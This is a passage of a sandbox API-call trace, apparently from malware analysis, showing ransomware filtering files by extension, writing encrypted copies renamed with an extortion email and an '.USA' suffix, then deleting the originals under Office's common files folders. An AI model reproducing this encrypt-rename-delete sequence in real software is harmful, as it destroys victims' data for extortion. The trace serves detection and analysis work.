Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0035.921] lstrlenW (lpString=".doc") returned 4 [0035.921] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString=".docx") returned 5 [0035.921] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0035.921] lstrlenW (lpString=".pdf") returned 4 [0035.921] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString=".xls") returned 4 [0035.921] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString=".xlsx") returned 5 [0035.921] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0035.921] lstrlenW (lpString=".ppt") returned 4 [0035.921] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0035.921] lstrlenW (lpString=".zip") returned 4 [0035.921] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.921] lstrlenW (lpString=".rar") returned 4 [0035.921] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString=".bz2") returned 4 [0035.921] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.921] lstrlenW (lpString=".7z") returned 3 [0035.921] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0035.921] lstrlenW (lpString=".dbf") returned 4 [0035.921] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0036.698] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2568) returned 1 [0036.698] CloseHandle (hObject=0x1a8) returned 1 [0036.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0x20 [0036.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.699] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0036.699] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0036.699] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.699] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.699] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.699] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0036.700] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0036.700] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.700] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.700] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.700] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0036.989] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0036.990] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0036.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0036.991] GetLastError () returned 0x0 [0036.991] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x545, lpOverlapped=0x0) returned 1 [0036.993] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x550, lpOverlapped=0x0) returned 1 [0036.994] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0036.994] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xee, lpOverlapped=0x0) returned 1 [0036.994] SetEndOfFile (hFile=0x1cc) returned 1 [0036.994] CloseHandle (hObject=0x1cc) returned 1 [0036.995] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0036.995] SetEndOfFile (hFile=0x160) returned 1 [0036.996] CloseHandle (hObject=0x160) returned 1 [0036.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0036.996] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0036.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.996] lstrlenW (lpString=".doc") returned 4 [0036.996] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString=".docx") returned 5 [0036.997] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0036.997] lstrlenW (lpString=".pdf") returned 4 [0036.997] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString=".xls") returned 4 [0036.997] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString=".xlsx") returned 5 [0036.997] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0036.997] lstrlenW (lpString=".ppt") returned 4 [0036.997] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString=".zip") returned 4 [0036.997] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0036.997] lstrlenW (lpString=".rar") returned 4 [0036.997] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString=".bz2") returned 4 [0036.997] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString=".7z") returned 3 [0036.997] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString=".dbf") returned 4 [0036.997] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString=".1cd") returned 4 [0036.997] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString=".jpg") returned 4 [0036.997] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.997] lstrlenW (lpString=".doc") returned 4 [0036.997] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString=".docx") returned 5 [0036.998] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0036.998] lstrlenW (lpString=".pdf") returned 4 [0036.998] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString=".xls") returned 4 [0036.998] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString=".xlsx") returned 5 [0036.998] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0036.998] lstrlenW (lpString=".ppt") returned 4 [0036.998] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.998] lstrlenW (lpString=".zip") returned 4 [0036.998] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0036.998] lstrlenW (lpString=".rar") returned 4 [0036.998] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString=".bz2") returned 4 [0036.998] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString=".7z") returned 3 [0036.998] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0036.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.998] lstrlenW (lpString=".dbf") returned 4 [0036.998] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.998] lstrlenW (lpString=".1cd") returned 4 [0036.998] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0036.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0036.998] lstrlenW (lpString=".jpg") returned 4 [0036.998] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0036.998] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0036.999] lstrlenW (lpString="SETUP.XML") returned 9 [0036.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0036.999] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2624) returned 1 [0037.000] CloseHandle (hObject=0x160) returned 1 [0037.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20 [0037.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0037.000] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.000] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.000] GetLastError () returned 0x0 [0037.000] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xa40, lpOverlapped=0x0) returned 1 [0037.002] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xa50, lpOverlapped=0x0) returned 1 [0037.003] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.003] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.003] SetEndOfFile (hFile=0x1cc) returned 1 [0037.003] CloseHandle (hObject=0x1cc) returned 1 [0037.004] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.004] SetEndOfFile (hFile=0x160) returned 1 [0037.004] CloseHandle (hObject=0x160) returned 1 [0037.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.005] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0037.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.005] lstrlenW (lpString=".doc") returned 4 [0037.005] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.005] lstrlenW (lpString=".docx") returned 5 [0037.005] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.005] lstrlenW (lpString=".pdf") returned 4 [0037.005] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.005] lstrlenW (lpString=".xls") returned 4 [0037.005] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.005] lstrlenW (lpString=".xlsx") returned 5 [0037.005] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.005] lstrlenW (lpString=".ppt") returned 4 [0037.005] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.005] lstrlenW (lpString=".zip") returned 4 [0037.005] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.005] lstrlenW (lpString=".rar") returned 4 [0037.005] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".bz2") returned 4 [0037.006] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".7z") returned 3 [0037.006] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString=".dbf") returned 4 [0037.006] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString=".1cd") returned 4 [0037.006] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString=".jpg") returned 4 [0037.006] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString=".doc") returned 4 [0037.006] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".docx") returned 5 [0037.006] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.006] lstrlenW (lpString=".pdf") returned 4 [0037.006] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".xls") returned 4 [0037.006] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".xlsx") returned 5 [0037.006] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.006] lstrlenW (lpString=".ppt") returned 4 [0037.006] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.006] lstrlenW (lpString=".zip") returned 4 [0037.006] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.006] lstrlenW (lpString=".rar") returned 4 [0037.006] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.006] lstrlenW (lpString=".bz2") returned 4 [0037.007] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.007] lstrlenW (lpString=".7z") returned 3 [0037.007] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.007] lstrlenW (lpString=".dbf") returned 4 [0037.007] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.007] lstrlenW (lpString=".1cd") returned 4 [0037.007] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.007] lstrlenW (lpString=".jpg") returned 4 [0037.007] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.007] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.007] lstrlenW (lpString="ExcelMUI.XML") returned 12 [0037.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0037.007] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1565) returned 1 [0037.007] CloseHandle (hObject=0x160) returned 1 [0037.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 0x20 [0037.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0037.008] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.008] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.008] GetLastError () returned 0x0 [0037.008] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x61d, lpOverlapped=0x0) returned 1 [0037.010] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x620, lpOverlapped=0x0) returned 1 [0037.011] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.011] WriteFile (in: hFile=0x1cc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 